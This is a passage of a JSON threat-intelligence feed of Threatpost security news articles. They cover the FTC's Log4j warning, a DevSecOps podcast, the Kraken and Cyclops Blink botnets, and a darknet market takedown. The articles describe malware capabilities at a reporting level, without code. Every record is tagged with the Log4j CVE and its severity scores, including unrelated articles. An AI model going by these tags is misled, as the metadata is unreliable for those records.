"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T21:15:47", "id": "THREATPOST:CAA9AA939562959323A4675228C233A5", "href": "https://threatpost.com/massive-linkedin-phishing-bot-attacks-hungry-job-seekers/178476/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:44:48", "description": "The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data [from the risks of](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the Log4j vulnerabilities, it [warned](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) on Tuesday.\n\n\u201cThe FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,\u201d according to the warning.\n\nThose companies that bungle consumer data, leaving vulnerabilities unpatched and thus opening the door to exploits and the resulting possible \u201closs or breach of personal information, financial loss and other irreversible harms,\u201d are risking consequences tied to weighty laws that have resulted in fat fines, the FTC said.\n\nIt mentioned, among others, the [Federal Trade Commission Act ](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>) and the [Gramm-Leach-Bliley Act](<https://threatpost.com/privacy-regulation-could-be-a-test-for-states-rights/138303/>). The FTC Act, the commission\u2019s primary statute, enables it to seek monetary redress and other relief for conduct injurious to consumers. [Gramm-Leach-Bliley](<https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act>) requires financial institutions to safeguard sensitive data.\n\n\u201c It is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,\u201d the FTC urged.\n\nThe FTC means it: Its warning included a reference to the complaints against Equifax, which agreed to pay $700 million to settle actions by the FTC, the Consumer Financial Protection Bureau, and all fifty states over its infamous [2017 data leak](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (consumers\u2019 reaction at the time: [Make it hurt more](<https://threatpost.com/200k-sign-petition-against-equifax-data-breach-settlement/148560/>)).\n\nAccording to the Equifax complaint, its failure to patch a known vulnerability \u201cirreversibly exposed the personal information of 147 million consumers.\u201d Expect more of the same if your company fails to protect consumer data from exposure as a result of Log4Shell or whatever similar, known vulnerabilities crop up, it said.\n\nThe FTC advised companies to use [guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) from the Cybersecurity and Infrastructure Security Agency (CISA) to check if they\u2019re using Apache\u2019s Log4j logging library, which is at the heart of the cluster of vulnerabilities known as [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>).\n\nCompanies that find that they are using Log4j should do the following, CISA recommended:\n\n * Update your Log4j software package to the [most current version](<https://logging.apache.org/log4j/2.x/security.html>).\n * Consult [CISA guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to mitigate this vulnerability.\n * Ensure remedial steps are taken to ensure that your company\u2019s practices do not violate the law. Failure to identify and patch instances of this software may violate [the FTC Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>).\n * Distribute this information to any relevant third-party subsidiaries that sell products or services to consumers who may be vulnerable.\n\nOn Dec. 17, CISA issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23. Federal agencies were given five more days \u2013 until Dec. 28 \u2013 to report Log4Shell-affected products, including vendor and app names and versions, along with what actions have been taken \u2013 e.g. updated, mitigated, removed from agency network \u2013 to block exploitation attempts.\n\nCISA provides a [dedicated page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for the Log4Shell flaws with patching information and has released a [Log4j scanner](<https://twitter.com/cisagov/status/1473401212468932609?s=12>) to hunt down potentially vulnerable web services.\n\n## The Log4j Fire Rages Unabated\n\nThe initial flaw \u2013 [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 was discovered on Dec. 9 and came under attack within hours. As of Dec. 15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit what became a trio of bugs:\n\n 1. The Log4Shell remote-code execution (RCE) bug that spawned [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and which led to \u2026\n 2. The [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch. Plus, there was \u2026\n 3. [A third bug](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>), a DoS flaw similar to Log4Shell in that it also affected the logging library. It differed in that it concerned Context Map lookups, not the Java Naming and Directory Interface (JNDI) lookups to an LDAP server involved in CVE-2021-44228: lookups that allow attackers to execute any code that\u2019s returned in the Log4Shell vulnerability.\n\nAt this point, the Conti ransomware gang has had a [full attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) in place for weeks.\n\nIn a Monday update, Microsoft said that the end of December [brought no relief](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>): The company observed state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through month\u2019s end. \u201cMicrosoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities,\u201d Microsoft security researchers warned.\n\n\u201cExploitation attempts and testing have remained high during the last weeks of December. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,\u201d the researchers said.\n\n## Hunting Down Log4j\n\nOne of the most challenging aspects of responding to the Log4j vulnerability is simply identifying the devices in an organization where Log4j is used. The word \u201cubiquitous\u201d has applied since the get-go.\n\n\u201cSince it is a cross-platform, widely used software library, there is incredible diversity in where and how it is deployed: it can be an application package installed by itself, bundled with another application package as just another file on disk or embedded in another application with no visible artifact,\u201d J.J. Guy, co-founder and CEO at Sevco Security, told Threatpost on Wednesday.\n\nHe added, \u201cEven worse, it is used in everything from cloud-managed services to server applications and even fixed-function, embedded devices. That internet-connected toaster is very likely vulnerable to Log4Shell.\u201d\n\nWe\u2019re just in the middle of the triage phase now, Guy said, where basic tools like systems-management or software-management tools to check for the file on disk can provide initial triage.\n\nOne question: What\u2019s the inventory of equipment that still needs to be triaged?\n\n\u201cFor organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage results requires they report not only the machines that have been triaged but also how many are pending triage,\u201d Guy remarked. \u201cReporting the \u2018pending triage\u2019 statistic requires a complete asset inventory, including which machines have been successfully triaged.\u201d\n\nHe called this \u201cone of the larger hidden challenges\u201d in every organization\u2019s response, given that so few have a comprehensive asset inventory, \u201cdespite the fact it has been a top requirement in every security compliance program for decades.\u201d\n\n[_Image courtesy of Quince Media._](<https://commons.wikimedia.org/wiki/File:3D_illustration_image_of_a_gavel_-_auction_hammer_-_free_to_use_in_your_projects_07.jpg>) [_Licensing details_](<https://creativecommons.org/licenses/by-sa/4.0/>)_. \n__ _ \n_**Password** **Reset: ****[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. **[Register &amp; stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T19:00:03", "type": "threatpost", "title": "FTC to Go After Companies that Ignore Log4j", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T19:00:03", "id": "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "href": "https://threatpost.com/ftc-pursue-companies-log4j/177368/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-17T22:17:44", "description": "\n\n(Brought to you by Uptycs. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nApplications are cybercriminals\u2019 favorite ways to crack open targeted organizations.\n\nYet no single team or process can assure the rollout of safe cloud applications. From code design to unit testing to deployment, teams and tools have to work together to detect risks early while keeping the pipeline of digital products moving.\n\nAlex Rice, CTO at HackerOne and Johnathan Hunt, VP of Security at GitLab, help development teams evolve their processes to build security directly into their workflows for smooth and safe cloud app rollouts.\n\nThey dropped by the Threatpost podcast recently to share tips on [DevSecOps](<https://threatpost.com/apps-built-better-devsecops-security-silver-bullet/167793/>), including:\n\n * How to build a continual testing, monitoring, and feedback processes to drive down application risk.\n * Developing a continuous approach to application security and DevOps security tools.\n * Why collaboration and continual feedback is essential across development, cloud and security teams.\n\n\u2026as well as how to deal with the boatload of animosity between development and security teams. One tip: Assume positive intent!\n\nHeads-up: Along with Aron Eidleman, Partner Solutions Architect at AWS, Alex and Johnathan will be participating in a joint[ webinar](<https://www.hackerone.com/events/mitigate-risk-cloud-ethical-hackers-and-devops?utm_source=gitlab&utm_medium=partner&utm_campaign=social-mitigate-risk-cloud-with-hackers-devops>) on Feb. 23 to discuss the importance of layering security practices into your DevOps workflows.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/021422_GitLab_HackerOne_Mixdown_1.mp3>). For more podcasts, check out[ Threatpost\u2019s podcast site](<https://threatpost.com/category/podcasts/>).\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:00:14", "type": "threatpost", "title": "Kill Cloud Risk: Get Everybody to Stop Fighting Over App Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:00:14", "id": "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "href": "https://threatpost.com/killing-cloud-risk-bulletproofing-app-security-podcast/178486/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:38", "description": "There\u2019s a new, still-under-development, [Golang](<https://threatpost.com/golang-cryptomining-worm-speed-boost/168456/>)-based botnet called Kraken with a level of brawn that belies its youth: It\u2019s using the [SmokeLoader](<https://threatpost.com/new-loader-variant-behind-widespread-malware-attacks/146683/>) malware loader to spread like wildfire and is already raking in a tidy USD $3,000/month for its operators, researchers report.\n\nThough its name may sound familiar, Kraken has little to do with the [2008 botnet](<https://www.theregister.com/2008/04/07/kraken_botnet_menace/>) of the same name, [wrote](<https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/>) ZeroFox threat researcher Stephan Simon in a Wednesday post.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nUsing SmokeLoader to install yet more malicious software on targeted machines, Kraken is picking up hundreds of new bots each time a new command-and-control (C2) server is deployed, according to Simon\u2019s post.\n\nZeroFox came upon the previously unknown botnet, which was still under active development, in late October 2021. Even though it was still being developed, it already had the ability to siphon sensitive data from Windows hosts, being able to to download and execute secondary payloads, run shell commands, and take screenshots of the victim\u2019s system, ZeroFox said.\n\n## Simple, But Multi-Tentacled\n\nZeroFox shared a screen capture of the initial version of Kraken\u2019s panel \u2013 shown below, the C2 was named \u201cKraken Panel\u201d \u2013 that\u2019s lean in features. It offered basic statistics, links to download payloads, an option to upload new payloads, and a way to interact with a specific number of bots.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17113451/Krakens-C2-panel-e1645115709526.jpeg>)\n\nEnglish-translated version of the Kraken C2 panel. Source: ZeroFox Intelligence.\n\n\u201cThis version did not appear to allow the operator(s) to choose which victims to interact with,\u201d Simon noted.\n\nBut the current version of Kraken\u2019s C2 panel, shown below, has been completely redesigned and renamed as Anubis. \u201cThe Anubis Panel provides far more information to the operator(s) than the original Kraken Panel,\u201d according to Simon. \u201cIn addition to the previously provided statistics, it is now possible to view command history and information about the victim.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17114005/Anubis-panel-for-Kraken-e1645116023649.jpeg>)\n\nDashboard for Kraken\u2019s latest C2 panel, called Anubis. Source: ZeroFox Intelligence.\n\n## Grabbing Cryptocurrency\n\nKraken\u2019s author has been tinkering, adding and deleting capabilities. At this point, Kraken can maintain persistence, collect information about the host, download and execute files, run shell commands, take screenshots, and steal various cryptocurrency wallets, including Zcash, Armory, Atomic, Bytecoin, Electrum, Ethereum, Exodus, Guarda and Jaxx Liberty.\n\nLater iterations have gotten yet more replete, with the author having added selective choosing of targets for commands (individually or by group, as opposed to the earlier version having only allowed a bot operator to choose how many victims they\u2019re targeting), task and command history, task ID, command being sent, how many victims the command should be sent to, the targeted geolocation, and a timestamp of when the task was initiated.\n\nAt first, from October to December 2021, the RedLine infostealer was inflicted on victims\u2019 machines every time Kraken struck. RedLine, an increasingly [prevalent](<https://threatpost.com/google-ppc-ads-used-to-deliver-infostealers/166644/>) infostealer, swipes data from browsers, such as saved credentials, autocomplete data and credit card information.\n\nThe malware has since spread its tentacles, though, both in terms of adding other infostealers to the mix and making its operators a boatload of dough. \u201cAs the operator(s) behind Kraken continued to expand and gather more victims, ZeroFox began observing other generic information stealers and cryptocurrency miners being deployed,\u201d according to Simon\u2019s writeup.\n\nAs of Wednesday, the botnet was pulling in around USD $3,000 every month, as shown in the screen capture below from Ethermine.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17120117/mining_stats-e1645117292604.jpg>)\n\nMining statistics from the cryptocurrency mining pool Ethermine. Source: ZeroFox Intelligence.\n\nWhat does the operator plan to do with the new bot and all the data its infostealers are sucking up? It\u2019s unknown at this point, ZeroFox researchers concluded: \u201cIt is currently unknown what the operator intends to do with the stolen credentials that have been collected or what the end goal is for creating this new botnet.\u201d\n\n## Steering Clear\n\nZeroFox passed on these recommendations to keep Kraken from tangling up your systems:\n\n * Ensure antivirus and intrusion detection software is up to date with all patches and rule sets.\n * Enable two-factor authentication for all organizational accounts to help mitigate phishing and credential stuffing attacks.\n * Maintain regularly scheduled backup routines, including off-site storage and integrity checks.\n * Avoid opening unsolicited attachments and never click suspicious links.\n * Log and monitor all administrative actions as much as possible. Alert on any suspicious activity.\n * Review network logs for potential signs of compromise and data egress.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T17:28:02", "type": "threatpost", "title": "Baby Golang-Based Botnet Already Pulling in $3K/Month for Operators", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T17:28:02", "id": "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "href": "https://threatpost.com/golang-botnet-pulling-in-3k-month/178509/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T17:24:48", "description": "The modular botnet known as Cyclops Blink, linked to the same advanced persistent threat (APT) behind the [NotPetya wiper attacks](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), is expanding its device targeting to include ASUS routers.\n\nFurther, it\u2019s likely that the botnet\u2019s purpose is far more sinister than the average [Mirai-knockoff\u2019s penchant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) for distributed denial-of-service (DDoS) attacks.\n\nThat\u2019s the word from Trend Micro researchers, who noted that Cyclops Blink casts a wide net in terms of the owners of the devices it chooses to infect, with no specific focus on high-value government or diplomatic entities. While that\u2019s out of step with typical APT behavior, researchers said that it\u2019s likely the botnet will be used as persistent infrastructure for mounting further attacks on high-value targets, and as such, should be indiscriminately distributed for maximum effect.\n\n\u201cIt should be noted that these victims do not appear to be evidently valuable targets for either economic, military or political espionage,\u201d according to the firm\u2019s analysis. \u201cFor example, some of the live command-and-control servers (C2s) are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States.\u201d\n\nCyclops Blink itself has been around since 2019, initially looking to infect WatchGuard Firebox devices according to a [February analysis (PDF)](<https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf>) performed by the UK\u2019s National Cyber Security Centre (NCSC). Now, to further its goal of widescale infections, ASUS routers are now on the menu, Trend Micro noted, with the latest variant incorporating a fresh module tailored to the vendor\u2019s devices.\n\n\u201cOur research was carried out on the RT-AC68U, but other ASUS routers such as RT-AC56U might be affected as well,\u201d researchers said. \u201cOur investigation shows that there are more than 200 Cyclops Blink victims around the world. Typical countries of infected WatchGuard devices and ASUS routers are the United States, India, Italy, Canada and a long list of other countries, including Russia.\u201d\n\n## **A Sinister Purpose?**\n\nCyclops Blink is the handiwork of the Russian-speaking Sandworm APT (a.k.a. Voodoo Bear or TeleBots), according to Trend Micro \u2013 the same group that\u2019s been [linked to a host of](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) very high-profile state-sponsored attacks, as well as the VPNFilter internet-of-things (IoT) botnet.\n\n\u201cSandworm was also responsible for\u2026the [2015 and 2016 attacks on the Ukrainian electrical grid](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), the 2017 NotPetya attack, the 2017 French presidential campaign, the [2018 Olympic Destroyer attack](<https://threatpost.com/olympic-destroyer-malware-behind-winter-olympics-cyberattack-researchers-say/129918/>) on the Winter Olympic Games and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW),\u201d researchers noted in a [Thursday analysis](<https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html>).\n\nInternet routers have been a favorite target for building out botnets for many years, thanks to \u201cinfrequency of patching, the lack of security software and the limited visibility of defenders\u201d when it comes to these devices, as Trend Micro put it. More often than not, such botnets are used to carry out DDoS attacks; but in Cyclops Blink\u2019s case, the motives are less obvious.\n\n\u201cThe purpose of this botnet is still unclear: Whether it is intended to be used for DDoS attacks, espionage or proxy networks remains to be seen,\u201d researchers said. \u201cBut what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.\u201d\n\nIn fact, some of the infected devices that researchers observed have been compromised for more than two and a half years, with some set up as stable C2 servers for other bots.\n\nIt is thus likely, the researchers speculated, that Cyclops Blink is destined for bigger horizons than denial of service.\n\n\u201cThe more routers are compromised, the more sources of powerful data collection \u2014 and avenues for further attacks \u2014 become available to attackers,\u201d according to the analysis, which raised the specter of \u201ceternal botnets.\u201d\n\n\u201cOnce an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying or anything else that the attacker wants to do,\u201d researchers warned. \u201cThe underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.\u201d\n\nGiven Sandworm\u2019s track record, it\u2019s wise to expect the worst, the firm noted.\n\n\u201cSandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best,\u201d researchers said.\n\n## **A Few Technical Specifics on a New Botnet Variant**\n\nCoded in the C language, Cyclops Blink relies on hard-coded TCP ports to communicate with a range of command-and-control servers (C2s), according to the analysis. For each port, it creates a rule in the Netfilter Linux kernel firewall to allow output communication to it.\n\nOnce it\u2019s made contact, the malware initializes an OpenSSL library, and its core component then cranks up operations for a series of hard-coded modules.\n\n\u201cCommunication with the modules is performed via pipes,\u201d according to Trend Micro. \u201cFor each hard-coded module, the malware creates two pipes before executing them in their own child processes.\u201d\n\nThe malware then pushes various parameters to the modules, which in turn respond with data that the core component encrypts with OpenSSL functions before sending it to the C2 server.\n\n\u201cThe data is encrypted using AES-256 in cipher block chaining (CBC) mode with a randomly generated 256-bit key and 128-bit initialization vector (IV). It is then encrypted using a hard-coded RSA-2560 (320-bit) public key unique to each sample,\u201d according to the analysis. \u201cThe C2 server must have the corresponding RSA private key to decrypt the data.\u201d\n\nResearchers added, \u201cTo send data to the C2 server, the core component performs a TLS handshake with a randomly chosen C2 server at a random TCP port, both of which are from a hard-coded list.\u201d\n\nInitially, the core component sends a list of supported commands to the C2 server and then waits to receive one of the commands back. These can be aimed at the core component itself or to one of its modules, according to the writeup.\n\nIf a command targets the core component, it can be one of the following:\n\n * Terminate the program\n * Bypass the data-sending interval and send data to C2 servers immediately\n * Add a new C2 server to the list in memory\n * Set time to send the next packet to the C2 server\n * Set time to send the next packet to the C2 server\n * Add a new module (an ELF file should be received following the command)\n * Reload the malware\n * Set the local IP address parameter\n * Set a new worker ID\n * Set an unknown byte value\n * Resend configuration to all running modules\n\nAs for the commands meant for the modules, the latest variant studied by Trend Micro now includes \u201cAsus (0x38),\u201d meant to activate a brand-new module built to infect ASUS routers.\n\n**Targeting ASUS Routers**\n\nThe ASUS module is built to access and replace a router\u2019s flash memory, thus enslaving it to the botnet, researchers explained.\n\n\u201cThis module can read and write from the devices\u2019 flash memory,\u201d they said. \u201cThe flash memory is used by these devices to store the operating system, configuration and all files from the file system.\u201d\n\nCyclops Blink reads 80 bytes from the flash memory, writes it to the main pipe, and then waits for a command with the data needed to replace the content.\n\n\u201cAs the flash memory content is permanent, this module can be used to establish persistence and survive factory resets,\u201d researchers explained.\n\nA second module, straightforwardly called \u201csystem reconnaissance (0x08),\u201d is responsible for gathering various data from the infected device and sending it to the C2 server.\n\nSpecifically, it harvests:\n\n * The Linux version of the device\n * Information about the device\u2019s memory consumption\n * The SSD storage information\n * The content of the following files: \n * /etc/passwd\n * /etc/group\n * /proc/mounts\n * /proc/partitions\n * Information about network interfaces\n\nA third module, \u201cfile download (0x0f),\u201d can download files from the internet using DNS over HTTPS (DoH).\n\nTrend Micro noted that ASUS is likely not the only new module that will emerge for the botnet. After all, Sandworm\u2019s previous botnet, VPNFilter, targeted a wide range of router vendors, including ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL and ZDE.\n\n\u201cWe have evidence that other routers are affected too, but as of reporting, we were not able to collect Cyclops Blink malware samples for routers other than WatchGuard and ASUS,\u201d according to the analysis. \u201cBased on our observation, we strongly believe that there are more targeted devices from other vendors. This malware is modular in nature, and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.\u201d\n\n## **How to Defend Against Becoming a Botnet Victim**\n\nLike with other botnets, organizations can protect themselves from Cyclops Blink attacks by falling back on basic security hygiene, Trend Micro noted, including the use of strong passwords, using a virtual private network (VPN), regular firmware patching and so on. Most successful compromises are the result of default or weak password use or the exploitation of known vulnerabilities.\n\nIf an organization\u2019s devices have been infected with Cyclops Blink, researchers said that the best course of action is to chuck the victimized router for a new one, given the malware\u2019s prodigious persistence capabilities.\n\n\u201cIt is best to get a new router,\u201d they explained. \u201cPerforming a factory reset might blank out an organization\u2019s configuration, but not the underlying operating system that the attackers have modified. If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible. However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor. In such cases, an average user would not have the ability to fix a Cyclops Blink infection.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T17:17:17", "type": "threatpost", "title": "Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T17:17:17", "id": "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "href": "https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:57:25", "description": "German authorities have taken down the Hydra marketplace \u2013 a popular destination on the Dark Web for trading in illicit goods and services, including cyberattack tools and stolen data.\n\nThis week, they were able to commandeer and take offline underpinning infrastructure such as servers, plus install a takedown banner in place of a working website, all while seizing $25 million (\u20ac23 million) in funds in the process.\n\n\u201cThe illegal marketplace was a Russian-language Darknet platform that had been accessible via the Tor network since at least 2015,\u201d according to a [Tuesday statement](<https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2022/Presse2022/220405_PM_IllegalerDarknetMarktplatz.html>) from Frankfurt\u2019s public prosecutor (ZIT) and 